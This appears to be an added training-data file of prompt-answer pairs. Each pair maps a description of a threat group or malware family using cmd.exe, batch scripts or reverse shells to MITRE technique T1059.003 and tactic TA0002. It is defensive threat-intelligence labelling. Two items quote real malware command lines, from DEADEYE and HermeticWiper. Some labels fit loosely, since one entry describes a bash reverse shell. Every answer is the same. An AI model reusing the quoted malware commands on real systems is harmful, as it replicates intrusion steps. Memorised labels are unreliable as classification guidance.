+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware uses cmd.exe to execute commands on a compromised host. A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used batch files to deploy open-source and multi-stage RATs.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has used batch files to initiate additional downloads of malicious files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used the command-line interface for code execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has used the Windows command line to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used a custom tool for creating reverse shells.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nomadic Octopus used cmd.exe /c within a malicious macro.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used macros to deliver malware such as QUADAGENT and OopsIE. OilRig has used batch scripts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor has used cmd.exe to execute commmands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used Windows command-line to run commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug has used command line during its intrusions.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several tools used by Suckfly have been command-line driven.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has executed commands using cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used cmd.exe to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used batch scripts to download tools and executing cryptocurrency miners.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used command-line interfaces for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used .bat scripts and `cmd` for execution on compromised hosts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used Windows command scripts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla RPC backdoors have used cmd.exe to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used the Windows command line to perform hands-on-keyboard activities in targeted environments including for discovery.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used `cmd.exe` to execute commands on a victim's machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used a tool to open a Windows Command Shell on a remote host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands. menuPass has used malicious macros embedded inside Office documents to execute files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 4H RAT has the capability to create a remote shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ABK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can create a remote shell and run a given command.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT can use `cmd.exe` to execute commands on an infected host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira executes from the Windows command line and can take various arguments for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor has used cmd.exe to run its self deletion routine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth spawns a CMD process to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer can use `cmd.exe` to execute a created batch file.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred can open a reverse shell on the system to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Adversaries can direct BACKSPACE to execute from the command line on infected hosts, or have BACKSPACE create a reverse shell.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use `cmd.exe` to execute commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS is capable of executing commands via cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT has a command to launch a command shell on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLACKCOFFEE has the capability to create a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has executed commands via cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk has the ability to use the command line to control execution on compromised hosts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has used cmd.exe to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig can download and run batch files to execute commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook is capable of spawning a Windows command shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot uses the command-line interface to execute arbitrary commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can launch cmd.exe to perform reconnaissance commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has launched cmd.exe and used the ShellExecuteW() API function to execute commands on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can use `cmd.exe` to enable shadow copy deletion.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can execute commands on a compromised network with the use of `cmd.exe`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackMould can run cmd.exe with parameters.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon can execute arbitrary commands and utilize the ""ComSpec"" environment variable.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use cmd.exe for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use `cmd.exe` to drop and run files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CALENDAR has a command to run cmd.exe to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBAT has the ability to execute command line arguments on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak has a command to create a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can run commands on the compromised asset with CMD functions.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used cmd to execute tasks on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The C# implementation of the CharmPower command execution module can use cmd.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component is capable of opening a command terminal.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can use cmd.exe for command execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can use cmd.exe to help execute commands on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike uses a command-line interface to interact with systems.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT can launch a remote command shell interface for executing commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker executes a bash script to establish a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used cmd.exe to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie executes BAT scripts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can utilize command line options to allow an attacker control over how it scans and encrypts files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in CozyCar allows arbitrary commands to be executed by invoking C:\Windows\System32\cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson has the ability to execute commands with the COMSPEC environment variable.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has used cmd.exe /c and batch files for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE can run `cmd /c copy /y /b C:\Users\public\syslog_6-*.dat C:\Users\public\syslog.dll` to combine separated sections of code into a single DLL prior to execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot has the ability to execute arbitrary commands via `cmd.exe`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can launch a remote shell to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses a malicious Windows Batch script to run the Windows code utility to retrieve follow-on script payloads.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can use `cmd.exe` to add registry keys for persistence.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can use `cmd.exe` to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf can execute shell commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis can launch a remote shell to execute arbitrary commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dipsind can spawn remote shells.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can use `cmd.exe` for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DownPaper uses the command line.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook can execute arbitrary shell commands on the victims' machines.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack has used cmd.exe to add a persistent service.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ECCENTRICBANDWAGON can use cmd to execute commands on a victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used batch files for execution and can launch Internet Explorer from cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary has the capability to create a remote shell and execute specified commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used cmd.exe to run a PowerShell script.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has modules for executing scripts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can use cmd.exe to execute malicious files on compromised hosts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has an integrated scripting engine to download and execute Lua scripts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Windows has a command to launch a remote shell and executes commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus uses command line for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can use `cmd.exe` to execute commands received from C2.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has used `cmd` to execute commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can use `cmd.exe` for execution on remote hosts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use a batch script to delete itself.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon uses cmd.exe to execute commands for discovery.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax can spawn a command shell, and execute native commands.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy can execute remote commands via the command-line interface.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT executes commands remotely on the infected host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy uses cmd.exe to execute itself in-memory.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can use the Windows Command Shell to execute commands, including its own removal.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 kills and disables services by using cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HARDRAIN uses cmd.exe to execute netshcommands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOMEFRY uses a command-line interface.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT can launch cmd.exe to execute commands on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser is capable of spawning a reverse shell on a victim.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth can provide a remote shell. One version of Helminth uses batch scripting.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can use `cmd.exe /Q/c move CSIDL_SYSTEM_DRIVE\temp\sys.tmp1 CSIDL_WINDOWS\policydefinitions\postgresql.exe 1> \\127.0.0.1\ADMIN$\_1636727589.6007507 2>&1` to deploy on an infected system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can use `cmd.exe` for execution on compromised hosts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor has the ability to create a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit has the ability to create a remote shell and run given commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant can remotely open applications on the infected host with the ShellExecuteA command.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT launches a shell to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can launch a remote shell to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe is capable of executing commands via cmd.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JCry has used cmd.exe to launch PowerShell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT uses a .bat file to execute a .dll.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can use the command-line utility cacls.exe to change file permissions.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE can execute shell commands using cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY has the ability to set a Registry key to run a cmd.exe command.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has used `cmd.exe` and batch files for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOMPROGO is capable of creating a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection chain.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet can execute commands using cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
